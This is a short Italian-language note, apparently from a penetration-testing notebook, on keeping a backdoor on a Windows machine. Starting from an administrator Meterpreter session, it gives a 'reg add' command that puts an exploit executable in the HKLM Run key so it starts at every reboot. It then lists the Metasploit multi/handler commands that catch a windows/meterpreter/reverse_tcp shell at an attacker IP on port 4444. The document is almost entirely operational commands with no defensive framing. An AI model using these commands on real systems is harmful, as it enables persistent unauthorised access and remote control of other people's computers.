tags: Windows_Backdoor metasploit meterpreter


Backdoor

Per creare una backdoor che si attiva ogni volta che il computer viene riavviato possiamo seguire i seguenti passaggi a partire da una sessione meterpreter con privilegi di amministratore:

 
shell
 
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
 

Dove andremo a sotituire C:\Users\Admin\Downloads\registry.exe con il percorso nel quale abbiamo inserito l’exploit.

Ora per accedere a questa backdoor possiamo utilizzare sempre metasploit tramite il multi handler

 
use exploit/multi/handler
 
set payload windows/meterpreter/reverse_tcp
 
set lhost <indirizzo IP attaccante>
 
set lport 4444